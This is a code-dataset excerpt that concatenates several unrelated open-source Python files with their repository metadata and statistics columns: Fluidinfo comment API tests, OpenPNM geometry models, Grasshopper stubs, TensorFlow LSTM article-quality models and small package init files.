objectID2 = ObjectAPI(self.user).create(u'@paparent')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='hashtag')
result = loads(result)['result']
self.assertEqual(0, len(result['objects']))
@inlineCallbacks
def testGetFollowsWithMalformedObjectType(self):
"""
The C{getFollowedObjects} method raises an error if the C{objectType}
is unknown.
"""
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': (u"Unknown object type: %r."
% u'malformed'),
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetFollowedObjectsReturnsNextPageID(self):
"""
The C{getFollowedObjects} method returns a C{nextPageID} value when
another page of objects could be loaded.
"""
for i in range(26):
objectID = ObjectAPI(self.user).create(u'about%d' % i)
TagValueAPI(self.user).set({objectID: {u'username/follows': None}})
# Moving the commit here so (I suspect) the tags will each have a
# different timestamp.
self.store.commit()
result = yield self.invoke('getFollowedObjects', username='username')
result = loads(result)['result']
self.assertNotEqual(None, result['nextPageID'])
self.assertEqual(20, len(result['objects']))
@inlineCallbacks
def testDeleteExistingComment(self):
"""
The C{delete} method attempts to remove a comment and returns a count
of the number of comments that were successfully deleted.
"""
when = datetime.utcnow()
comments = SecureCommentAPI(self.user)
values = comments.create(
u'comment', u'username', when=when, about=[u'chickens'],
importer=u'digg.com')
self.store.commit()
self.assertNotEqual([], comments.getForObject(u'chickens'))
result = yield self.invoke('delete',
url=values['fluidinfo.com/info/url'])
result = loads(result)['result']
self.assertEqual({'deletedComments': 1}, result)
self.store.commit()
self.assertEqual([], comments.getForObject(u'chickens'))
def testDeleteNonexistentComment(self):
"""
The C{delete} method returns 0 deleted comments when a non-existent
comment is deleted.
"""
result = yield self.invoke('delete',
'http://fluidinfo.com/comment/'
'importer/username/2012-08-03T22:04:13')
result = loads(result)['result']
self.assertEqual({'deletedComments': 0}, result)
@inlineCallbacks
def testUpdateExistingComment(self):
"""The C{update} method updates the text of a comment."""
when = datetime.utcnow()
floatTime = timegm(when.utctimetuple()) + float(when.strftime('0.%f'))
comments = SecureCommentAPI(self.user)
values = comments.create(
u'comment', u'username', when=when, about=[u'chickens'],
importer=u'digg.com')
url = values['fluidinfo.com/info/url']
self.store.commit()
result = yield self.invoke('update',
url=url,
newText=u'new text')
result = loads(result)['result']
expected = {
u'fluidinfo.com/info/about': [u'chickens'],
u'fluidinfo.com/info/text': u'new text',
u'fluidinfo.com/info/timestamp': floatTime,
u'fluidinfo.com/info/url': url,
u'fluidinfo.com/info/username': u'username'
}
self.assertEqual(expected, result)
self.store.commit()
[comment] = comments.getForObject(u'chickens')
self.assertEqual(expected, comment)
@inlineCallbacks
def testUpdateWithEmptyURL(self):
"""The C{update} method raises an error if the url is empty."""
result = yield self.invoke('update', url='', newText=u'new text')
result = loads(result)
self.assertEqual({
u'error': {
u'code': 400,
u'message': u'URL is missing or just contains whitespace.'
},
u'id': 100,
u'jsonrpc': u'2.0'}, result)
@inlineCallbacks
def testUpdateWithBadURL(self):
"""
The C{update} method raises an error if the url is not well formed.
"""
result = yield self.invoke('update', url='http://something',
newText=u'new text')
result = loads(result)
self.assertIn(u'error', result)
@inlineCallbacks
def testUpdateWithEmptyText(self):
"""
The C{update} method raises an error if the text is empty.
"""
result = yield self.invoke('update',
url='http://fluidinfo.com/comment/'
'importer/username/2012-08-03T22:04:13',
newText=u'')
result = loads(result)
self.assertIn(u'error', result)
| 44.663456
| 79
| 0.546505
| 7,567
| 74,186
| 5.353244
| 0.06013
| 0.058063
| 0.071492
| 0.071344
| 0.8189
| 0.797151
| 0.779155
| 0.757579
| 0.734077
| 0.708922
| 0
| 0.032272
| 0.326679
| 74,186
| 1,660
| 80
| 44.690361
| 0.778683
| 0.112204
| 0
| 0.781199
| 0
| 0
| 0.234234
| 0.072998
| 0
| 0
| 0
| 0
| 0.073744
| 1
| 0.059968
| false
| 0.001621
| 0.017828
| 0
| 0.080227
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89240dcff30e74ab0f6666ad094a454271c919aa
| 249
|
py
|
Python
|
sargeparse/_parser/__init__.py
|
DiegoPomares/sargeparseN
|
32424cd1a87c8efba4a2e2c08540478bec9f63a2
|
[
"Apache-2.0"
] | 1
|
2018-09-05T12:51:16.000Z
|
2018-09-05T12:51:16.000Z
|
sargeparse/_parser/__init__.py
|
DiegoPomares/sargeparseN
|
32424cd1a87c8efba4a2e2c08540478bec9f63a2
|
[
"Apache-2.0"
] | 23
|
2018-05-30T10:39:38.000Z
|
2018-07-11T12:50:39.000Z
|
sargeparse/_parser/__init__.py
|
DiegoPomares/sargeparseN
|
32424cd1a87c8efba4a2e2c08540478bec9f63a2
|
[
"Apache-2.0"
] | 1
|
2018-07-10T16:42:26.000Z
|
2018-07-10T16:42:26.000Z
|
from sargeparse._parser.argument import Argument # NOQA
from sargeparse._parser.group import ArgumentGroup, MutualExclussionGroup # NOQA
from sargeparse._parser.data import ArgumentData # NOQA
from sargeparse._parser.parser import Parser # NOQA
| 49.8
| 81
| 0.831325
| 29
| 249
| 7
| 0.37931
| 0.275862
| 0.394089
| 0.35468
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116466
| 249
| 4
| 82
| 62.25
| 0.922727
| 0.076305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8937e10ffe58badc5a6c48edf2665cf932bc5fb3
| 128
|
py
|
Python
|
project_checker/checker/filesystem/__init__.py
|
zuzannnaobajtek/github-cmake-project-checker
|
1406c2247bbbecb490bc5000c7fa521b9bf96ec0
|
[
"MIT"
] | 1
|
2017-05-17T21:21:54.000Z
|
2017-05-17T21:21:54.000Z
|
project_checker/checker/filesystem/__init__.py
|
zuzannnaobajtek/github-cmake-project-checker
|
1406c2247bbbecb490bc5000c7fa521b9bf96ec0
|
[
"MIT"
] | 13
|
2018-03-28T15:36:17.000Z
|
2018-04-25T16:44:00.000Z
|
project_checker/checker/filesystem/__init__.py
|
zuzannnaobajtek/github-cmake-project-checker
|
1406c2247bbbecb490bc5000c7fa521b9bf96ec0
|
[
"MIT"
] | 15
|
2017-05-31T11:44:20.000Z
|
2018-04-19T15:03:35.000Z
|
from project_checker.checker.filesystem.directory import Directory
from project_checker.checker.filesystem.report import Report
| 42.666667
| 66
| 0.890625
| 16
| 128
| 7
| 0.4375
| 0.196429
| 0.321429
| 0.446429
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 128
| 2
| 67
| 64
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
89a9b0371ff90516dd2f849cd5fd1d34134e34b9
| 3,649
|
py
|
Python
|
openpnm/models/geometry/pore_cross_sectional_area.py
|
halotudio/openPNM-copy2
|
d400ec65e9421256a531f6d22a38255b002d5dcb
|
[
"MIT"
] | 1
|
2021-05-01T11:10:43.000Z
|
2021-05-01T11:10:43.000Z
|
openpnm/models/geometry/pore_cross_sectional_area.py
|
halotudio/openPNM-copy2
|
d400ec65e9421256a531f6d22a38255b002d5dcb
|
[
"MIT"
] | null | null | null |
openpnm/models/geometry/pore_cross_sectional_area.py
|
halotudio/openPNM-copy2
|
d400ec65e9421256a531f6d22a38255b002d5dcb
|
[
"MIT"
] | null | null | null |
from numpy import pi as _pi
def sphere(target, pore_diameter='pore.diameter'):
r"""
Calculate cross-sectional area assuming the pore body is a sphere.
Parameters
----------
target : GenericGeometry
The Geometry object which this model is associated with. This
controls the length of the calculated array, and also provides
access to other necessary geometric properties.
pore_diameter : str
The dictionary key of the array on the Geometry object containing
the pore diameter values necessary to find the area.
Returns
-------
ndarray
Array containing pore area values.
"""
D = target[pore_diameter]
return _pi/4 * D**2
def cone(target, pore_diameter='pore.diameter'):
r"""
Calculate cross-sectional area assuming the pore body is a cone.
Parameters
----------
target : GenericGeometry
The Geometry object which this model is associated with. This
controls the length of the calculated array, and also provides
access to other necessary geometric properties.
pore_diameter : str
The dictionary key of the array on the Geometry object containing
the pore diameter values necessary to find the area.
Returns
-------
ndarray
Array containing pore area values.
"""
D = target[pore_diameter]
return _pi / 4 * D**2
def cube(target, pore_diameter='pore.diameter'):
r"""
Calculate cross-sectional area assuming the pore body is a cube
Parameters
----------
target : GenericGeometry
The Geometry object which this model is associated with. This
controls the length of the calculated array, and also provides
access to other necessary geometric properties.
pore_diameter : str
The dictionary key of the array on the Geometry object containing
the pore diameter values necessary to find the area.
Returns
-------
ndarray
Array containing pore area values.
"""
D = target[pore_diameter]
return D**2
def circle(target, pore_diameter='pore.diameter'):
r"""
Calculate cross-sectional area assuming the pore body is a circle.
Parameters
----------
target : GenericGeometry
The Geometry object which this model is associated with. This
controls the length of the calculated array, and also provides
access to other necessary geometric properties.
pore_diameter : str
The dictionary key of the array on the Geometry object containing
the pore diameter values necessary to find the area.
Returns
-------
ndarray
Array containing pore area values.
Notes
-----
This model should only be used for true 2D networks, i.e. with planar
symmetry.
"""
return target[pore_diameter]
def square(target, pore_diameter='pore.diameter'):
r"""
Calculate cross-sectional area assuming the pore body is a square.
Parameters
----------
target : GenericGeometry
The Geometry object which this model is associated with. This
controls the length of the calculated array, and also provides
access to other necessary geometric properties.
pore_diameter : str
The dictionary key of the array on the Geometry object containing
the pore diameter values necessary to find the area.
Returns
-------
ndarray
Array containing pore area values.
Notes
-----
This model should only be used for true 2D networks, i.e. with planar
symmetry.
"""
return target[pore_diameter]
| 28.069231
| 73
| 0.665936
| 461
| 3,649
| 5.232104
| 0.158351
| 0.124378
| 0.074627
| 0.045605
| 0.965174
| 0.965174
| 0.965174
| 0.965174
| 0.965174
| 0.965174
| 0
| 0.002622
| 0.268293
| 3,649
| 129
| 74
| 28.286822
| 0.900749
| 0.74952
| 0
| 0.368421
| 0
| 0
| 0.120148
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| false
| 0
| 0.052632
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
9823bf8a463868c0fdbfd2340a9fda285173549d
| 6,217
|
py
|
Python
|
release/stubs.min/Grasshopper/GUI/Equations.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 182
|
2017-06-27T02:26:15.000Z
|
2022-03-30T18:53:43.000Z
|
release/stubs.min/Grasshopper/GUI/Equations.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 28
|
2017-06-27T13:38:23.000Z
|
2022-03-15T11:19:44.000Z
|
release/stubs.min/Grasshopper/GUI/Equations.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 67
|
2017-06-28T09:43:59.000Z
|
2022-03-20T21:17:10.000Z
|
# encoding: utf-8
# module Grasshopper.GUI.Equations calls itself Equations
# from Grasshopper,Version=1.0.0.20,Culture=neutral,PublicKeyToken=dda4f5ec2cd80803
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class GH_EquationFragment(object,IGH_EquationFragment):
# no doc
def Layout(self,font):
""" Layout(self: GH_EquationFragment,font: Font) -> bool """
pass
def Position(self,location):
""" Position(self: GH_EquationFragment,location: PointF) -> bool """
pass
def Render(self,graphics,font,colour):
""" Render(self: GH_EquationFragment,graphics: Graphics,font: Font,colour: Color) """
pass
def ToExpression(self):
""" ToExpression(self: GH_EquationFragment) -> str """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Bounds(self: GH_EquationFragment) -> RectangleF
"""
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Description(self: GH_EquationFragment) -> str
"""
Icon=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Icon(self: GH_EquationFragment) -> Bitmap
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Name(self: GH_EquationFragment) -> str
"""
Pivot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Pivot(self: GH_EquationFragment) -> PointF
Set: Pivot(self: GH_EquationFragment)=value
"""
Size=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Size(self: GH_EquationFragment) -> SizeF
"""
m_pivot=None
m_size=None
class GH_SequenceFragment(GH_EquationFragment,IGH_EquationFragment):
""" GH_SequenceFragment() """
def Layout(self,font):
""" Layout(self: GH_SequenceFragment,font: Font) -> bool """
pass
def Position(self,location):
""" Position(self: GH_SequenceFragment,location: PointF) -> bool """
pass
def Render(self,graphics,font,colour):
""" Render(self: GH_SequenceFragment,graphics: Graphics,font: Font,colour: Color) """
pass
def ToExpression(self):
""" ToExpression(self: GH_SequenceFragment) -> str """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Description(self: GH_SequenceFragment) -> str
"""
Fragments=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Fragments(self: GH_SequenceFragment) -> List[IGH_EquationFragment]
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Name(self: GH_SequenceFragment) -> str
"""
m_pivot=None
m_size=None
class GH_TextFragment(GH_EquationFragment,IGH_EquationFragment):
""" GH_TextFragment() """
def Layout(self,font):
""" Layout(self: GH_TextFragment,font: Font) -> bool """
pass
def Position(self,location):
""" Position(self: GH_TextFragment,location: PointF) -> bool """
pass
def Render(self,graphics,font,colour):
""" Render(self: GH_TextFragment,graphics: Graphics,font: Font,colour: Color) """
pass
def ToExpression(self):
""" ToExpression(self: GH_TextFragment) -> str """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Description(self: GH_TextFragment) -> str
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Name(self: GH_TextFragment) -> str
"""
Text=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Text(self: GH_TextFragment) -> str
Set: Text(self: GH_TextFragment)=value
"""
m_pivot=None
m_size=None
class IGH_EquationFragment:
# no doc
def Layout(self,font):
""" Layout(self: IGH_EquationFragment,font: Font) -> bool """
pass
def Position(self,location):
""" Position(self: IGH_EquationFragment,location: PointF) -> bool """
pass
def Render(self,graphics,font,colour):
""" Render(self: IGH_EquationFragment,graphics: Graphics,font: Font,colour: Color) """
pass
def ToExpression(self):
""" ToExpression(self: IGH_EquationFragment) -> str """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Bounds(self: IGH_EquationFragment) -> RectangleF
"""
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Description(self: IGH_EquationFragment) -> str
"""
Icon=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Icon(self: IGH_EquationFragment) -> Bitmap
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Name(self: IGH_EquationFragment) -> str
"""
Pivot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Pivot(self: IGH_EquationFragment) -> PointF
Set: Pivot(self: IGH_EquationFragment)=value
"""
Size=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: Size(self: IGH_EquationFragment) -> SizeF
"""
| 26.91342
| 215
| 0.68554
| 760
| 6,217
| 5.330263
| 0.107895
| 0.1333
| 0.07998
| 0.10664
| 0.823254
| 0.787213
| 0.787213
| 0.766477
| 0.753641
| 0.753641
| 0
| 0.003466
| 0.16471
| 6,217
| 230
| 216
| 27.030435
| 0.776622
| 0.330224
| 0
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.3
| 0
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
98287a4c73b8f74706180614b411ec7615a72701
| 10,533
|
py
|
Python
|
DLScripts/article_quality/lstm_model.py
|
StanleyLeiSun/PlayGround
|
e8774ef41043e88cc64fc1eacbf0edd99a40ba35
|
[
"Apache-2.0"
] | 1
|
2018-08-12T11:40:28.000Z
|
2018-08-12T11:40:28.000Z
|
DLScripts/article_quality/lstm_model.py
|
StanleyLeiSun/PlayGround
|
e8774ef41043e88cc64fc1eacbf0edd99a40ba35
|
[
"Apache-2.0"
] | 4
|
2021-03-18T20:30:11.000Z
|
2022-03-11T23:19:54.000Z
|
DLScripts/article_quality/lstm_model.py
|
StanleyLeiSun/PlayGround
|
e8774ef41043e88cc64fc1eacbf0edd99a40ba35
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import numpy as np
import lstm_config
def get_model(config, is_training = True):
return RNN_Model_Category(config, is_training)
class RNN_Model_Category(object):
def __init__(self,config,is_training=True):
self.keep_prob=config.keep_prob
self.batch_size=tf.Variable(0,dtype=tf.int32,trainable=False)
num_step=config.num_step
self.input_data=tf.placeholder(tf.int32,[None,num_step])
self.target = tf.placeholder(tf.int64,[None])
self.mask_x = tf.placeholder(tf.float32,[num_step,None])
class_num=config.class_num
hidden_neural_size=config.hidden_neural_size
vocabulary_size=config.vocabulary_size
embed_dim=config.embed_dim
hidden_layer_num=config.hidden_layer_num
self.new_batch_size = tf.placeholder(tf.int32,shape=[],name="new_batch_size")
#op to update batch size
self._batch_size_update = tf.assign(self.batch_size,self.new_batch_size)
#build LSTM network
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size,forget_bias=0.0,state_is_tuple=True)
if self.keep_prob<1:
lstm_cell = tf.nn.rnn_cell.DropoutWrapper(
lstm_cell,output_keep_prob=self.keep_prob
)
cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell]*hidden_layer_num,state_is_tuple=True)
#self._initial_state = cell.zero_state(self.batch_size,dtype=tf.float32)
self._initial_state = cell.zero_state(640,dtype=tf.float32)
#embedding layer
with tf.device(lstm_config.training_device),tf.name_scope("embedding_layer"):
embedding = tf.get_variable("embedding",[vocabulary_size,embed_dim],dtype=tf.float32)
inputs=tf.nn.embedding_lookup(embedding,self.input_data)
if self.keep_prob<1:
inputs = tf.nn.dropout(inputs,self.keep_prob)
out_put=[]
state=self._initial_state
with tf.variable_scope("LSTM_layer"):
for time_step in range(num_step):
if time_step>0: tf.get_variable_scope().reuse_variables()
(cell_output,state)=cell(inputs[:,time_step,:],state)
out_put.append(cell_output)
out_put=out_put*self.mask_x[:,:,None]
with tf.name_scope("mean_pooling_layer"):
out_put=tf.reduce_sum(out_put,0)/(tf.reduce_sum(self.mask_x,0)[:,None])
with tf.name_scope("Softmax_layer_and_output"):
softmax_w = tf.get_variable("softmax_w",[hidden_neural_size,class_num],dtype=tf.float32)
softmax_b = tf.get_variable("softmax_b",[class_num],dtype=tf.float32)
self.logits = tf.matmul(out_put,softmax_w)+softmax_b
with tf.name_scope("loss"):
self.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.logits+1e-10,labels = self.target)#??
#self.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.target,labels = self.target)#??
self.cost = tf.reduce_mean(self.loss)
with tf.name_scope("accuracy"):
self.prediction = tf.argmax(self.logits,1)
correct_prediction = tf.equal(self.prediction,self.target)
self.correct_num=tf.reduce_sum(tf.cast(correct_prediction,tf.float32))
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32),name="accuracy")
#add summary
loss_summary = tf.summary.scalar("loss",self.cost)
#add summary
accuracy_summary=tf.summary.scalar("accuracy_summary",self.accuracy)
if not is_training:
return
self.globle_step = tf.Variable(0,name="globle_step",trainable=False)
self.lr = tf.Variable(0.0,trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars),
config.max_grad_norm)
# Keep track of gradient values and sparsity (optional)
grad_summaries = []
for g, v in zip(grads, tvars):
if g is not None:
grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(v.name), g)
sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
self.grad_summaries_merged = tf.summary.merge(grad_summaries)
self.summary =tf.summary.merge([loss_summary,accuracy_summary,self.grad_summaries_merged])
optimizer = tf.train.GradientDescentOptimizer(self.lr)
optimizer.apply_gradients(zip(grads, tvars))
self.train_op=optimizer.apply_gradients(zip(grads, tvars))
self.new_lr = tf.placeholder(tf.float32,shape=[],name="new_learning_rate")
self._lr_update = tf.assign(self.lr,self.new_lr)
def assign_new_lr(self,session,lr_value):
session.run(self._lr_update,feed_dict={self.new_lr:lr_value})
def assign_new_batch_size(self,session,batch_size_value):
session.run(self._batch_size_update,feed_dict={self.new_batch_size:batch_size_value})
class RNN_Model_Regression(object):
def __init__(self,config,is_training=True):
self.keep_prob=config.keep_prob
self.batch_size=tf.Variable(0,dtype=tf.int32,trainable=False)
num_step=config.num_step
self.input_data=tf.placeholder(tf.int32,[None,num_step])
self.target = tf.placeholder(tf.float32,[None])
self.mask_x = tf.placeholder(tf.float32,[num_step,None])
hidden_neural_size=config.hidden_neural_size
vocabulary_size=config.token_vacabulary_size
embed_dim=config.embed_dim
hidden_layer_num=config.hidden_layer_num
self.new_batch_size = tf.placeholder(tf.int32,shape=[],name="new_batch_size")
#op to update batch size
self._batch_size_update = tf.assign(self.batch_size,self.new_batch_size)
#build LSTM network
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size,forget_bias=0.0,state_is_tuple=True)
if self.keep_prob<1:
lstm_cell = tf.nn.rnn_cell.DropoutWrapper(
lstm_cell,output_keep_prob=self.keep_prob
)
cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell]*hidden_layer_num,state_is_tuple=True)
#self._initial_state = cell.zero_state(self.batch_size,dtype=tf.float32)
self._initial_state = cell.zero_state(640,dtype=tf.float32)
#embedding layer
with tf.device(lstm_config.training_device),tf.name_scope("embedding_layer"):
embedding = tf.get_variable("embedding",[vocabulary_size,embed_dim],dtype=tf.float32)
inputs=tf.nn.embedding_lookup(embedding,self.input_data)
if self.keep_prob<1:
inputs = tf.nn.dropout(inputs,self.keep_prob)
out_put=[]
state=self._initial_state
with tf.variable_scope("LSTM_layer"):
for time_step in range(num_step):
if time_step>0: tf.get_variable_scope().reuse_variables()
(cell_output,state)=cell(inputs[:,time_step,:],state)
out_put.append(cell_output)
out_put=out_put*self.mask_x[:,:,None]
#print(out_put)
#print(self.mask_x)
with tf.name_scope("mean_pooling_layer"):
out_put=tf.reduce_sum(out_put,0)/(tf.reduce_sum(self.mask_x,0)[:,None])
#print(out_put)
with tf.name_scope("Softmax_layer_and_output"):
softmax_w = tf.get_variable("softmax_w",[hidden_neural_size,1],dtype=tf.float32)
softmax_b = tf.get_variable("softmax_b",[1], dtype=tf.float32)
#softmax_w = tf.get_variable("softmax_w",[1,hidden_neural_size],dtype=tf.float32)
self.logits = tf.matmul(out_put,softmax_w) + softmax_b
self.logits = tf.reshape(self.logits,[-1])
#print(self.logits)
with tf.name_scope("loss"):
#self.lost = tf.reduce_mean(tf.square(self.logits+1e-10 - self.target))
self.lost = tf.reduce_mean(tf.abs(self.logits+1e-10 - self.target))
self.cost = self.lost
with tf.name_scope("accuracy"):
#self.prediction = tf.argmax(self.logits+1e-10, 0.0)
prediction = self.logits
correct_prediction = tf.less_equal(tf.abs(prediction - self.target), 0.08)
self.correct_item = tf.cast(correct_prediction,tf.float32)
self.correct_num=tf.reduce_sum(tf.cast(correct_prediction,tf.float32))
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32),name="accuracy")
#print(self.target)
#print(self.correct_prediction)
#add summary
loss_summary = tf.summary.scalar("loss",self.cost)
#add summary
accuracy_summary=tf.summary.scalar("accuracy_summary",self.accuracy)
if not is_training:
return
self.globle_step = tf.Variable(0,name="globle_step",trainable=False)
self.lr = tf.Variable(0.0,trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars),
config.max_grad_norm)
# Keep track of gradient values and sparsity (optional)
grad_summaries = []
for g, v in zip(grads, tvars):
if g is not None:
grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(v.name), g)
sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
self.grad_summaries_merged = tf.summary.merge(grad_summaries)
self.summary =tf.summary.merge([loss_summary,accuracy_summary,self.grad_summaries_merged])
optimizer = tf.train.GradientDescentOptimizer(self.lr)
optimizer.apply_gradients(zip(grads, tvars))
self.train_op=optimizer.apply_gradients(zip(grads, tvars))
self.new_lr = tf.placeholder(tf.float32,shape=[],name="new_learning_rate")
self._lr_update = tf.assign(self.lr,self.new_lr)
def assign_new_lr(self,session,lr_value):
session.run(self._lr_update,feed_dict={self.new_lr:lr_value})
def assign_new_batch_size(self,session,batch_size_value):
session.run(self._batch_size_update,feed_dict={self.new_batch_size:batch_size_value})
| 42.132
| 122
| 0.669135
| 1,448
| 10,533
| 4.587017
| 0.11395
| 0.03523
| 0.023186
| 0.018067
| 0.909515
| 0.904095
| 0.892352
| 0.874737
| 0.874737
| 0.874737
| 0
| 0.012833
| 0.215798
| 10,533
| 249
| 123
| 42.301205
| 0.791283
| 0.07823
| 0
| 0.822785
| 0
| 0
| 0.042136
| 0.004957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044304
| false
| 0
| 0.018987
| 0.006329
| 0.094937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
983b55009d3640bb635c7f0524ac92850b245336
| 45
|
py
|
Python
|
final_project/machinetranslation/__init__.py
|
ankur1198/xzceb-flask_eng_fr
|
d64c99522968e2d6536d6c6ceeef56f6a21090ec
|
[
"Apache-2.0"
] | null | null | null |
final_project/machinetranslation/__init__.py
|
ankur1198/xzceb-flask_eng_fr
|
d64c99522968e2d6536d6c6ceeef56f6a21090ec
|
[
"Apache-2.0"
] | null | null | null |
final_project/machinetranslation/__init__.py
|
ankur1198/xzceb-flask_eng_fr
|
d64c99522968e2d6536d6c6ceeef56f6a21090ec
|
[
"Apache-2.0"
] | null | null | null |
#from . import tests
from . import translator
| 22.5
| 24
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 24
| 22.5
| 0.921053
| 0.422222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
